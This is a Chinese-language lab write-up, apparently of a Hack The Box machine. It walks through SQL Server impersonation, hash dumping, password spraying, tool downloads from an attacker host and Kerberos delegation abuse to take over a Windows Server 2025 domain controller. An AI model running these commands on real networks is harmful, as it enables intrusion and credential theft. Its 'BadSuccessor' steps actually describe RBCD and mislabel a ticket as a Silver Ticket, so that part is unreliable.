域Windows Server 2025 BadSuccessor - Active Directory利用
字数 1735 2025-11-26 12:18:42
Windows Server 2025 BadSuccessor漏洞利用教学文档
概述
本教学文档详细介绍了针对Windows Server 2025 Build 26100环境中Active Directory的渗透测试过程,重点分析了BadSuccessor权限提升漏洞的发现和利用方法。
环境信息
- 目标系统:Windows Server 2025 Build 26100
- 域名:eighteen.htb
- 域控制器:DC01 (10.10.11.95)
第一阶段:信息收集
端口扫描
使用Nmap进行全端口扫描:
sudo nmap -O -A -Pn -T3 -p- 10.10.11.95
发现开放服务:
- 80/tcp:Microsoft IIS httpd 10.0
- 1433/tcp:Microsoft SQL Server 2022
- 5985/tcp:WinRM服务
初始凭据获取
获得初始SQL Server登录凭据:
- 用户名:kevin
- 密码:iNa2we6haRj2gaw!
第二阶段:SQL Server权限提升
初始连接测试
使用Impacket工具连接SQL Server:
impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@10.10.11.95'
发现当前权限为guest用户,权限受限。
数据库枚举
- 查询系统数据库:
SELECT name FROM master.dbo.sysdatabases;
发现financial_planner数据库但无法访问。
- 枚举服务器主体:
SELECT name AS LoginName, type_desc AS AccountType
FROM sys.server_principals
WHERE type_desc NOT IN ('SERVER_ROLE', 'ASYMMETRIC_KEY', 'CERTIFICATE')
ORDER BY name;
权限提升
使用nxc工具枚举模拟权限:
nxc mssql -u kevin -p iNa2we6haRj2gaw! -M enum_impersonate 10.10.11.95 --local-auth
发现appdev用户具有模拟权限。
在SQL会话中执行权限提升:
EXECUTE AS LOGIN = 'appdev';
数据提取
- 访问financial_planner数据库:
USE financial_planner;
SELECT name FROM sys.tables;
- 提取用户凭据:
SELECT * FROM users;
获得管理员哈希值:
admin@eighteen.htb:pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
哈希破解
使用自定义Python脚本破解Werkzeug哈希:
#!/usr/bin/env python3
import hashlib
from multiprocessing import Pool, cpu_count
def check_password(password):
# 哈希验证逻辑
pass
# 主要破解代码
第三阶段:域枚举和横向移动
RID暴力枚举
使用nxc枚举域用户:
nxc mssql 10.10.11.95 -u kevin -p iNa2we6haRj2gaw! --rid-brute --local-auth
WinRM密码喷洒
发现有效凭据:
- 用户名:adam.scott
- 密码:iloveyou1
建立WinRM连接
evil-winrm -i 10.10.11.95 -u adam.scott@eighteen.htb -p iloveyou1
第四阶段:权限提升准备
内部信息收集
- 上传winPEAS.bat进行系统枚举:
Invoke-WebRequest -Uri 'http://YOUR_IP:8000/winPEAS.bat' -OutFile "$env:USERPROFILE\Desktop\winPEAS.bat"
- 运行信息收集:
./winPEAS.bat > win.txt
- 使用BloodHound收集域信息:
Invoke-WebRequest -Uri 'http://YOUR_IP:8089/SharpHound.exe' -OutFile "$env:USERPROFILE\Desktop\SharpHound.exe"
第五阶段:BadSuccessor漏洞利用
漏洞背景
Windows Server 2025引入了委派托管服务帐户(dMSA)功能,BadSuccessor漏洞允许在特定条件下提升权限。
漏洞检测
使用PowerShell脚本检测:
.\Get-BadSuccessorOUPermissions.ps1
输出结果:
Identity OUs
-------- ---
EIGHTEEN\IT {OU=Staff,DC=eighteen,DC=htb}
漏洞利用步骤
1. 创建计算机账户
使用bloodyAD工具在OU=Staff,DC=eighteen,DC=htb中创建计算机账户hackheart。
2. 设置RBCD权限
为hackheart$设置基于资源的约束委派权限,允许其代表任意用户。
3. 获取TGT票据
使用计算出的NTLM哈希获取hackheart$的TGT票据。
4. 获取Silver Ticket
使用impacket-getST获取Silver Ticket,代表Administrator访问ldap/dc01.eighteen.htb服务:
impacket-getST -dc-ip 10.10.11.95 -spn ldap/dc01.eighteen.htb -impersonate Administrator eighteen.htb/hackheart$
5. 获取域控权限
使用获得的票据通过psexec获取SYSTEM权限:
impacket-psexec -k -no-pass dc01.eighteen.htb
关键技术和工具总结
使用工具
- Nmap:端口扫描和服务识别
- Impacket:MSSQL客户端和票据操作
- nxc:网络凭证扫描和枚举
- evil-winrm:Windows远程管理
- BloodHound/SharpHound:Active Directory关系分析
- bloodyAD:Active Directory操作工具
技术要点
- SQL Server权限提升技术
- 基于资源的约束委派攻击
- Kerberos票据操作
- BadSuccessor漏洞原理和利用
- Windows Server 2025新特性分析
防御建议
- 及时安装Windows Server 2025安全更新
- 限制SQL Server中的模拟权限
- 监控Active Directory中的异常计算机账户创建
- 实施基于时间的Kerberos策略
- 定期审核域权限委派设置
参考资源
- Microsoft安全公告:BadSuccessor漏洞详情
- Active Directory安全最佳实践
- Windows Server 2025安全配置指南
本教学文档仅用于安全研究和教育目的,请勿用于非法活动。